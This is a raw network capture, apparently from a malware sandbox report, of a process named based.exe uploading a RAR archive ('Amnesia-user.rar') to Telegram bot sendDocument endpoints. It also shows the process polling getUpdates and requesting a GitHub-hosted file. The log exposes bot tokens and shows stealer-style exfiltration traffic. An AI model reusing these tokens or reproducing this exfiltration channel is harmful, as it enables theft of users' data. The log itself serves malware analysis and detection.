75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	56216	149.154.167.220	443	7556	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:10 UTC	268	OUT	POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 726661 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=161c9c7024ec927ca4ee8a9975446522
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 2d 2d 31 36 31 63 39 63 37 30 32 34 65 63 39 32 37 63 61 34 65 65 38 61 39 39 37 35 34 34 36 35 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 41 6d 6e 65 73 69 61 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 8b 28 2c bd 21 04 00 00 01 0f aa 9c 87 6c 2e 15 71 f6 3d 24 d4 1b 59 73 db 90 9f 49 c9 45 e0 7c 05 07 b5 8b f1 71 78 21 39 fe c2 d0 7a db 06 d3 a6 d2 7a 11 5b d7 89 85 e4 bc 88 33 87 1b b0 85 04 8c 44 6c e5 a4 24 1f 64 d2 bd 63 b6 90 59 4e 3b f2 99 4e d0 6a 5c 8d 67 Data Ascii: --161c9c7024ec927ca4ee8a9975446522Content-Disposition: form-data; name="document"; filename="Amnesia-user.rar"Content-Type: application/octet-streamRar!(,!l.q=$YsIE\|qx!9zz[3Dl$dcYN;Nj\g
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 63 da e1 9f b3 cf 80 d3 f4 88 a5 7f a7 3c 74 af 83 af 71 60 b8 e9 f6 ad f5 f8 88 0d 12 1b 11 25 b4 61 8a 98 49 1b ff 38 13 2c af a5 ef 89 03 1d d1 b1 8e d2 80 73 ec 75 4d 0d 17 7b 3c 66 6d ca a2 65 e0 65 18 cc 2b 02 f7 f5 31 90 5d 31 0f 82 2e 86 13 6b 80 5e 13 70 b3 4c db 53 db d7 1d 2e 11 b8 90 6b 87 c1 2b 10 d9 37 1b bf 05 ff e4 ce 47 83 7b 4e 75 8b ce 6a 30 a4 9f 58 85 64 8e c6 58 f7 1a e5 17 b0 14 d2 7e 97 23 19 28 f3 82 7d c8 13 62 dc 88 17 f8 a2 8e 52 fb a2 a6 3d bb 19 6d 4b 8e ac 07 dd 95 0b d6 19 8b 6a 31 05 45 e1 5b 99 17 9b f0 97 3b 48 4d 83 1d 8d 60 e1 80 a7 dd 10 02 05 28 99 37 68 96 f5 9b 4f 1b f1 8e f0 1a a5 7f a5 50 46 15 ca fb cc f3 c5 a2 2f 0c c7 68 9f 99 95 70 93 db 81 15 fd ec cf 03 56 5b 5b 3a e3 6a b5 3d 4d ea 24 4e c9 7f e6 9d 91 b8 Data Ascii: c<tq`%aI8,suM{<fmee+1]1.k^pLS.k+7G{Nuj0XdX~#(}bR=mKj1E[;HM`(7hOPF/hpV[[:j=M$N
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 78 b1 56 c2 58 d0 af ce 9a 0c 8b b9 3f 1d df 01 d7 e9 06 1c 38 2e 72 7c 72 77 a3 a2 fe 6e 90 ae 28 da 7f 4f e7 e7 ca 5e 8b 27 bd ac 1f 48 33 20 00 95 48 52 14 fb 77 35 96 0f 56 59 48 f2 41 58 95 10 19 e9 6d 7a e9 41 63 f9 61 21 73 b8 20 91 d5 41 6e dd 1c 80 41 87 ea b9 44 66 a3 78 ba 9a a4 57 e5 5d 77 43 f5 a0 93 a5 fd 8f a2 ce 43 07 53 4a 70 89 00 36 0a b0 55 48 4e db 1d 0a 3e dc 49 57 9c 92 e1 72 b7 79 02 1e 46 e1 bd 73 5d 84 7f 61 a1 24 c4 e5 13 f6 49 f2 28 2f 6f d2 13 0d cb f3 07 c5 de 0c 99 d6 94 79 9a 3f cc 23 41 83 0e 0a 90 7a a7 a9 7f a1 e6 89 d7 11 04 e9 5e 7d ba d5 be 3c 76 fb 85 f2 a3 b4 aa 4a 11 49 91 6d e1 be ef 4d 55 ae 5c 08 e4 59 31 1e 3f d7 2b 84 84 e1 17 e6 f4 9d 11 29 a0 ee 98 4a 13 4a 87 7e d7 6d 5c 31 77 21 38 1e df 55 fe e8 bd 17 f4 Data Ascii: xVX?8.r\|rwn(O^'H3 HRw5VYHAXmzAca!s AnADfxW]wCCSJp6UHN>IWryFs]a$I(/oy?#Az^}<vJImMU\Y1?+)JJ~m\1w!8U
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: d9 7a ab 4c 3d 53 10 68 ac be e8 5e 85 5a 85 c2 c7 f4 0e 85 c8 ad 5f 5f 91 a3 e8 e4 a6 0b fa d3 42 cf a6 09 e1 6b 85 ae f3 06 0c 0e ae ef c0 c2 66 83 2a ee 8b 46 29 97 1d 2e 76 3e dc 6a 3f de 69 f0 19 1e dc bc 5e b7 a7 5b 90 49 51 e9 8a 3d 8c 70 58 da 5b 38 4c d2 e6 a7 69 5e df d9 58 e9 ef 2e 50 15 e7 fa 5d 1a a7 bf 7c 28 91 7e 6e ab d1 ae 9c ea 1b 7f 58 66 63 cb 94 d8 51 ca a3 86 1e a1 8a 11 1d b6 5b 52 40 d6 cd 90 d7 8c a9 89 7c 62 71 50 48 1f 52 24 ef 2f 0c e7 dc 02 62 d7 8f 86 91 b1 92 98 54 53 1e 21 14 9a aa 4f 0f 31 13 ab 3d 48 a0 c3 8e 11 9a 31 66 a2 9d 61 74 ed 64 e0 d0 21 2a a5 37 2c 85 73 33 b8 f4 ce 38 9a 90 56 15 53 df a2 dc 48 71 22 26 25 3d 1c 4e 39 fd 1e 05 96 93 37 00 60 4a 12 fa dd e5 67 91 96 89 c3 6d 0f d8 9d ce 57 8e 29 d6 14 1e 7f 28 Data Ascii: zL=Sh^Z__BkfF).v>j?i^[IQ=pX[8Li^X.P]\|(~nXfcQ[R@\|bqPHR$/bTS!O1=H1fatd!7,s38VSHq"&%=N97`JgmW)(
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 6d 92 e6 27 c3 3a 88 c9 03 a9 38 25 89 0a ab 44 85 be f0 fe e7 c3 47 ab d0 c8 1f 98 c5 fa 1c 4b b4 d7 4b 07 9f 0f ed f7 1f 8a f6 54 36 3a 07 43 f0 8e 2c 6e 3a f8 95 1f 86 3a b4 7b 25 7a da e4 55 45 80 bf 3e c1 77 98 86 41 f5 d2 6b 9d 73 96 eb a9 18 62 f5 3a bd 78 b4 94 96 10 cc ac 1a cd 8c 36 7b 80 44 9d b8 84 70 98 b4 f8 01 ec d3 c9 23 4b 2e cd 05 26 51 24 1e a5 ad 86 96 98 ac b4 6a b5 59 6e 5d 9a cf f5 66 ba 58 df 80 3a 94 42 4b 56 2c 6a 70 9e 60 5d b8 db 7e 18 65 18 88 0b f3 51 df 40 6c 6d 68 96 48 8c 98 2e ad be eb 12 58 98 09 ce 7d 2d 44 3f f4 1d 80 e0 11 07 e3 4f 1f fd 04 f4 61 9a 6e 1b f0 64 a7 68 71 81 4b 73 c8 77 0d e5 d4 ff 7f 09 53 44 2e 6a 50 e9 c2 53 da 32 87 8e 0c cb de a1 03 b9 94 be f3 2e 70 e5 b8 69 4a b5 88 df 42 b0 e9 da e5 69 f9 4e 0d Data Ascii: m':8%DGKKT6:C,n::{%zUE>wAksb:x6{Dp#K.&Q$jYn]fX:BKV,jp`]~eQ@lmhH.X}-D?OandhqKswSD.jPS2.piJBiN
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: b2 c1 97 af ec 9d a4 b1 4d c6 62 51 81 38 0f 59 a6 8d 74 65 0f 52 b6 d7 d3 6c 13 33 dc 04 42 f2 38 b4 7a 7d cc dc bd aa 26 b4 d6 3a ea 51 bd b3 12 b4 c4 31 c1 d8 b2 1b 8f ef c3 20 69 b5 3f 3d a6 cc 9a 7d 71 55 06 a1 44 bd 71 ce ed 7a 05 30 95 4a 69 12 75 de d0 36 43 90 6d f9 84 b4 3f a8 0b 6b 71 ed 91 95 7e 7a f5 dd 27 12 07 75 47 a0 43 d7 8c e8 ec dc 50 17 71 6b 14 31 40 8d 6a 64 de e2 fd e7 c1 39 66 bc b6 67 9b bd 1c 9e 61 2d ee 91 fb b1 65 4f de 1f f7 12 2f eb 4e c2 01 9b 7b cc d5 22 87 da ed 51 21 24 ea f4 f5 45 1b 40 71 32 ae 98 e2 4f c2 aa 76 07 57 ba db 5b cc 4d b5 43 fd 79 88 0f a0 73 3d 77 64 39 4d b0 83 22 11 ac 95 3e 5b 22 e9 bb d8 59 2e 6e 32 f7 8c 0c 8a 98 e8 69 fa 16 c7 ea 02 78 da dc 10 64 49 a9 44 a4 49 c0 06 13 57 4e 9c 72 3a cc 59 62 c7 Data Ascii: MbQ8YteRl3B8z}&:Q1 i?=}qUDqz0Jiu6Cm?kq~z'uGCPqk1@jd9fga-eO/N{"Q!$E@q2OvW[MCys=wd9M">["Y.n2ixdIDIWNr:Yb
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 6a 80 a0 72 58 ef ff 83 5b b6 27 2c c7 01 bd 88 c0 82 dc 6a 07 14 e3 5a d3 66 ee 13 d3 90 51 91 87 68 69 ad 40 74 dd df 82 14 76 a4 b2 43 67 bc 78 5c f7 80 3e c4 28 99 fa 16 67 b4 fe 4f bd e5 84 d3 d0 65 41 ee 4d 79 d7 2a 47 45 aa d6 be 2d 9b b8 bc 81 bd b7 04 e6 41 cc 48 26 0f 49 cc 97 d7 3a b5 f4 fb 4a 8b 45 cc 2f 58 70 df af d4 b8 02 a5 66 8b 0c 72 b2 ca e1 c0 d7 d6 c2 f7 98 68 c9 d5 cb 6e 21 5b 5f 94 83 42 d5 04 34 28 0f 2b a9 52 55 50 9f 69 2b 84 5c eb 7c 97 c9 f7 d6 0b e4 c8 43 42 f9 69 74 68 cd 88 33 0d 00 b8 ca 69 b7 52 41 9d 27 eb 47 01 95 29 ee f6 91 5c 20 58 a2 f3 76 48 ca b2 9c ad 9b 7a 6b 10 db f4 4a e2 3c da d9 e2 dd 7a 0a 59 a5 37 38 6b e0 77 13 c1 8a bb 13 ca 58 15 9a 9e 6b 15 57 4c 8d a1 29 f0 a6 03 36 b0 a6 57 ac c9 30 1b f8 b5 f4 6c ce Data Ascii: jrX[',jZfQhi@tvCgx\>(gOeAMy*GE-AH&I:JE/Xpfrhn![_B4(+RUPi+\\|CBith3iRA'G)\ XvHzkJ<zY78kwXkWL)6W0l
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 58 b7 6e ba 12 f9 71 3f 4c 3c f4 c5 e6 76 b5 95 2e 40 7f 85 fc 70 f0 48 b7 29 5f 4c c5 98 0a 59 70 89 a8 27 fc 65 b9 59 de 8d f7 ab c6 69 28 f8 fe 32 e2 1f eb a7 90 22 f7 e6 03 fc 28 37 42 0e 9c 58 f3 9f 0b 43 c1 06 3d 92 26 49 3a e4 4d 9c 18 f4 2c 40 40 4f 45 8e a9 78 f1 c2 1f 9c 51 55 5e ba b1 82 1d ea c7 7d 68 d9 ff 57 3d ce 46 e5 74 e0 16 92 f7 4b 5f 8c 43 0c dc 51 40 d6 9e 47 9e e5 9b 1c 9b af 1a 0c 25 d7 78 73 92 8b 54 a7 54 f5 e2 31 ab e8 93 46 94 11 a0 ea c8 57 7b 78 42 2f 59 3b b2 2c 1e 08 ca d2 59 98 c4 8d aa fe db 9c 33 a8 00 11 be b0 fd d9 89 36 b7 a6 ba 2a 24 4d f0 c5 03 cd a0 12 35 0a 8f 5b e5 e0 16 87 8c 0f b0 65 82 b0 e2 24 2f fc e4 05 f0 f8 03 e6 db 5c f1 be 4e b3 97 72 f0 a2 72 67 bd 13 59 f1 9b 21 c8 90 4c 5a a7 e2 03 f8 58 db 80 53 78 Data Ascii: Xnq?L<v.@pH)_LYp'eYi(2"(7BXC=&I:M,@@OExQU^}hW=FtK_CQ@G%xsTT1FW{xB/Y;,Y36*$M5[e$/\NrrgY!LZXSx
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 6f 0f ca 37 9c f8 25 d2 32 3f c2 bc b4 b2 7d b4 a0 15 71 eb 22 8b 8b ef 4e fb 01 d7 60 5d 69 f6 15 6f 0f 40 3a 98 11 ea d3 e7 e1 2e bc b1 b8 97 f0 01 0c db 48 82 0c b9 58 b7 0f ad be 79 70 e1 84 08 26 57 94 09 ee 71 4d 28 c3 0d 86 65 bb f7 42 0d 58 8d dd a1 1a 5b fb 74 5d 98 25 6d 5e 7f 0e cd 71 60 7c ea f0 7f 55 40 da dc 0e 42 5f 31 01 d3 a4 13 1a a7 b9 f7 3b 33 23 97 33 47 01 9e 6f 72 c1 c0 b6 ab b0 b6 b5 dd 24 aa a3 9e 18 8a 84 9e 52 99 a0 3a 93 41 5c 71 bf 11 7e f2 d2 52 4f 8f bb 05 23 da f4 c3 d7 3c 0a 6f d7 05 3e b7 40 5f 70 63 b1 94 59 59 7f bb 7c 3b f2 79 bd 24 53 5e 5e e1 e0 ca 26 9e a6 0c 41 48 8d 6b 7a af 75 38 4f 3f b5 8d 3f 2f e4 97 cf 65 f3 21 4d b7 5f f6 bf ca 82 d8 91 fa bf 8f 1e 05 2b 21 41 71 0e e5 23 b1 70 4c 80 4b de e0 ec f0 b0 e4 ae Data Ascii: o7%2?}q"N`]io@:.HXyp&WqM(eBX[t]%m^q`\|U@B_1;3#3Gor$R:A\q~RO#<o>@_pcYY\|;y$S^^&AHkzu8O??/e!M_+!Aq#pLK
2024-09-02 14:51:10 UTC	16384	OUT	Data Raw: 20 2d 8a d9 ac 42 b9 ff d2 1c 81 cd 0f 8c 57 f3 99 0e e5 2e 57 73 7c b8 60 27 26 59 b5 69 45 57 29 4f c5 43 7c ef 82 8e 53 fb 13 0d 70 0f 20 b0 80 e1 0d 02 6d 4b 2c a2 01 29 2b df ff fc 07 37 11 9c ad 74 c0 07 82 4e 32 df a2 09 56 f0 1e c3 7c d1 b1 9f 58 6c ae 84 38 bb b9 95 96 17 1b f3 aa 8e b3 06 7b 88 e8 58 3e 0b 15 ea 6b 19 1d 1a 60 0b fd f9 97 95 23 37 63 c2 dd 48 1b f4 98 5e 6d 0e 66 9f 5d f0 ea 53 2b 8e ba 75 c3 82 a2 6e 5d 54 3e bb 85 02 ec 3b 51 a4 80 07 29 02 88 77 66 34 0f 13 d3 2e 9c 6e 3f 6d 8d 8e 8e 96 b7 28 29 72 96 08 18 59 85 b1 38 ad 3c b5 cf 01 63 68 c6 fb 89 03 a8 f2 59 c7 05 67 8a 76 f5 8f 1e d7 df ce b0 59 c2 50 bd 87 d2 d9 11 6f 60 20 d7 d0 73 a2 c5 21 37 17 ab db 96 1c 70 97 a1 be c1 45 ab a5 9f 47 b5 34 07 6c bd 58 97 aa 1f 68 64 Data Ascii: -BW.Ws\|`'&YiEW)OC\|Sp mK,)+7tN2V\|Xl8{X>k`#7cH^mf]S+un]T>;Q)wf4.n?m()rY8<chYgvYPo` s!7pEG4lXhd
2024-09-02 14:51:11 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:11 GMT Content-Type: application/json Content-Length: 1696 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	56217	185.199.108.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:10 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-09-02 14:51:11 UTC	805	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 4BC6:2FE511:14088E6:1677DBF:66D5D0DE Accept-Ranges: bytes Date: Mon, 02 Sep 2024 14:51:11 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890098-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1725288671.982740,VS0,VE39 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 771c01c7b7923e503ab0af36fb714f58690fda02 Expires: Mon, 02 Sep 2024 14:56:11 GMT Source-Age: 0
2024-09-02 14:51:11 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	56218	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:11 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:11 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:11 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	56219	149.154.167.220	443	7556	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:12 UTC	268	OUT	POST /bot7337890485:AAHJolyS1xe_Y4XOAIPHADM1TG5Ae02NIcU/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 726658 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=9fee579897f0cbd9de59c96cbb420fcf
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 2d 2d 39 66 65 65 35 37 39 38 39 37 66 30 63 62 64 39 64 65 35 39 63 39 36 63 62 62 34 32 30 66 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 41 6d 6e 65 73 69 61 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 8b 28 2c bd 21 04 00 00 01 0f aa 9c 87 6c 2e 15 71 f6 3d 24 d4 1b 59 73 db 90 9f 49 c9 45 e0 7c 05 07 b5 8b f1 71 78 21 39 fe c2 d0 7a db 06 d3 a6 d2 7a 11 5b d7 89 85 e4 bc 88 33 87 1b b0 85 04 8c 44 6c e5 a4 24 1f 64 d2 bd 63 b6 90 59 4e 3b f2 99 4e d0 6a 5c 8d 67 Data Ascii: --9fee579897f0cbd9de59c96cbb420fcfContent-Disposition: form-data; name="document"; filename="Amnesia-user.rar"Content-Type: application/octet-streamRar!(,!l.q=$YsIE\|qx!9zz[3Dl$dcYN;Nj\g
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 63 da e1 9f b3 cf 80 d3 f4 88 a5 7f a7 3c 74 af 83 af 71 60 b8 e9 f6 ad f5 f8 88 0d 12 1b 11 25 b4 61 8a 98 49 1b ff 38 13 2c af a5 ef 89 03 1d d1 b1 8e d2 80 73 ec 75 4d 0d 17 7b 3c 66 6d ca a2 65 e0 65 18 cc 2b 02 f7 f5 31 90 5d 31 0f 82 2e 86 13 6b 80 5e 13 70 b3 4c db 53 db d7 1d 2e 11 b8 90 6b 87 c1 2b 10 d9 37 1b bf 05 ff e4 ce 47 83 7b 4e 75 8b ce 6a 30 a4 9f 58 85 64 8e c6 58 f7 1a e5 17 b0 14 d2 7e 97 23 19 28 f3 82 7d c8 13 62 dc 88 17 f8 a2 8e 52 fb a2 a6 3d bb 19 6d 4b 8e ac 07 dd 95 0b d6 19 8b 6a 31 05 45 e1 5b 99 17 9b f0 97 3b 48 4d 83 1d 8d 60 e1 80 a7 dd 10 02 05 28 99 37 68 96 f5 9b 4f 1b f1 8e f0 1a a5 7f a5 50 46 15 ca fb cc f3 c5 a2 2f 0c c7 68 9f 99 95 70 93 db 81 15 fd ec cf 03 56 5b 5b 3a e3 6a b5 3d 4d ea 24 4e c9 7f e6 9d 91 b8 Data Ascii: c<tq`%aI8,suM{<fmee+1]1.k^pLS.k+7G{Nuj0XdX~#(}bR=mKj1E[;HM`(7hOPF/hpV[[:j=M$N
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 78 b1 56 c2 58 d0 af ce 9a 0c 8b b9 3f 1d df 01 d7 e9 06 1c 38 2e 72 7c 72 77 a3 a2 fe 6e 90 ae 28 da 7f 4f e7 e7 ca 5e 8b 27 bd ac 1f 48 33 20 00 95 48 52 14 fb 77 35 96 0f 56 59 48 f2 41 58 95 10 19 e9 6d 7a e9 41 63 f9 61 21 73 b8 20 91 d5 41 6e dd 1c 80 41 87 ea b9 44 66 a3 78 ba 9a a4 57 e5 5d 77 43 f5 a0 93 a5 fd 8f a2 ce 43 07 53 4a 70 89 00 36 0a b0 55 48 4e db 1d 0a 3e dc 49 57 9c 92 e1 72 b7 79 02 1e 46 e1 bd 73 5d 84 7f 61 a1 24 c4 e5 13 f6 49 f2 28 2f 6f d2 13 0d cb f3 07 c5 de 0c 99 d6 94 79 9a 3f cc 23 41 83 0e 0a 90 7a a7 a9 7f a1 e6 89 d7 11 04 e9 5e 7d ba d5 be 3c 76 fb 85 f2 a3 b4 aa 4a 11 49 91 6d e1 be ef 4d 55 ae 5c 08 e4 59 31 1e 3f d7 2b 84 84 e1 17 e6 f4 9d 11 29 a0 ee 98 4a 13 4a 87 7e d7 6d 5c 31 77 21 38 1e df 55 fe e8 bd 17 f4 Data Ascii: xVX?8.r\|rwn(O^'H3 HRw5VYHAXmzAca!s AnADfxW]wCCSJp6UHN>IWryFs]a$I(/oy?#Az^}<vJImMU\Y1?+)JJ~m\1w!8U
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: d9 7a ab 4c 3d 53 10 68 ac be e8 5e 85 5a 85 c2 c7 f4 0e 85 c8 ad 5f 5f 91 a3 e8 e4 a6 0b fa d3 42 cf a6 09 e1 6b 85 ae f3 06 0c 0e ae ef c0 c2 66 83 2a ee 8b 46 29 97 1d 2e 76 3e dc 6a 3f de 69 f0 19 1e dc bc 5e b7 a7 5b 90 49 51 e9 8a 3d 8c 70 58 da 5b 38 4c d2 e6 a7 69 5e df d9 58 e9 ef 2e 50 15 e7 fa 5d 1a a7 bf 7c 28 91 7e 6e ab d1 ae 9c ea 1b 7f 58 66 63 cb 94 d8 51 ca a3 86 1e a1 8a 11 1d b6 5b 52 40 d6 cd 90 d7 8c a9 89 7c 62 71 50 48 1f 52 24 ef 2f 0c e7 dc 02 62 d7 8f 86 91 b1 92 98 54 53 1e 21 14 9a aa 4f 0f 31 13 ab 3d 48 a0 c3 8e 11 9a 31 66 a2 9d 61 74 ed 64 e0 d0 21 2a a5 37 2c 85 73 33 b8 f4 ce 38 9a 90 56 15 53 df a2 dc 48 71 22 26 25 3d 1c 4e 39 fd 1e 05 96 93 37 00 60 4a 12 fa dd e5 67 91 96 89 c3 6d 0f d8 9d ce 57 8e 29 d6 14 1e 7f 28 Data Ascii: zL=Sh^Z__BkfF).v>j?i^[IQ=pX[8Li^X.P]\|(~nXfcQ[R@\|bqPHR$/bTS!O1=H1fatd!7,s38VSHq"&%=N97`JgmW)(
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 6d 92 e6 27 c3 3a 88 c9 03 a9 38 25 89 0a ab 44 85 be f0 fe e7 c3 47 ab d0 c8 1f 98 c5 fa 1c 4b b4 d7 4b 07 9f 0f ed f7 1f 8a f6 54 36 3a 07 43 f0 8e 2c 6e 3a f8 95 1f 86 3a b4 7b 25 7a da e4 55 45 80 bf 3e c1 77 98 86 41 f5 d2 6b 9d 73 96 eb a9 18 62 f5 3a bd 78 b4 94 96 10 cc ac 1a cd 8c 36 7b 80 44 9d b8 84 70 98 b4 f8 01 ec d3 c9 23 4b 2e cd 05 26 51 24 1e a5 ad 86 96 98 ac b4 6a b5 59 6e 5d 9a cf f5 66 ba 58 df 80 3a 94 42 4b 56 2c 6a 70 9e 60 5d b8 db 7e 18 65 18 88 0b f3 51 df 40 6c 6d 68 96 48 8c 98 2e ad be eb 12 58 98 09 ce 7d 2d 44 3f f4 1d 80 e0 11 07 e3 4f 1f fd 04 f4 61 9a 6e 1b f0 64 a7 68 71 81 4b 73 c8 77 0d e5 d4 ff 7f 09 53 44 2e 6a 50 e9 c2 53 da 32 87 8e 0c cb de a1 03 b9 94 be f3 2e 70 e5 b8 69 4a b5 88 df 42 b0 e9 da e5 69 f9 4e 0d Data Ascii: m':8%DGKKT6:C,n::{%zUE>wAksb:x6{Dp#K.&Q$jYn]fX:BKV,jp`]~eQ@lmhH.X}-D?OandhqKswSD.jPS2.piJBiN
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: b2 c1 97 af ec 9d a4 b1 4d c6 62 51 81 38 0f 59 a6 8d 74 65 0f 52 b6 d7 d3 6c 13 33 dc 04 42 f2 38 b4 7a 7d cc dc bd aa 26 b4 d6 3a ea 51 bd b3 12 b4 c4 31 c1 d8 b2 1b 8f ef c3 20 69 b5 3f 3d a6 cc 9a 7d 71 55 06 a1 44 bd 71 ce ed 7a 05 30 95 4a 69 12 75 de d0 36 43 90 6d f9 84 b4 3f a8 0b 6b 71 ed 91 95 7e 7a f5 dd 27 12 07 75 47 a0 43 d7 8c e8 ec dc 50 17 71 6b 14 31 40 8d 6a 64 de e2 fd e7 c1 39 66 bc b6 67 9b bd 1c 9e 61 2d ee 91 fb b1 65 4f de 1f f7 12 2f eb 4e c2 01 9b 7b cc d5 22 87 da ed 51 21 24 ea f4 f5 45 1b 40 71 32 ae 98 e2 4f c2 aa 76 07 57 ba db 5b cc 4d b5 43 fd 79 88 0f a0 73 3d 77 64 39 4d b0 83 22 11 ac 95 3e 5b 22 e9 bb d8 59 2e 6e 32 f7 8c 0c 8a 98 e8 69 fa 16 c7 ea 02 78 da dc 10 64 49 a9 44 a4 49 c0 06 13 57 4e 9c 72 3a cc 59 62 c7 Data Ascii: MbQ8YteRl3B8z}&:Q1 i?=}qUDqz0Jiu6Cm?kq~z'uGCPqk1@jd9fga-eO/N{"Q!$E@q2OvW[MCys=wd9M">["Y.n2ixdIDIWNr:Yb
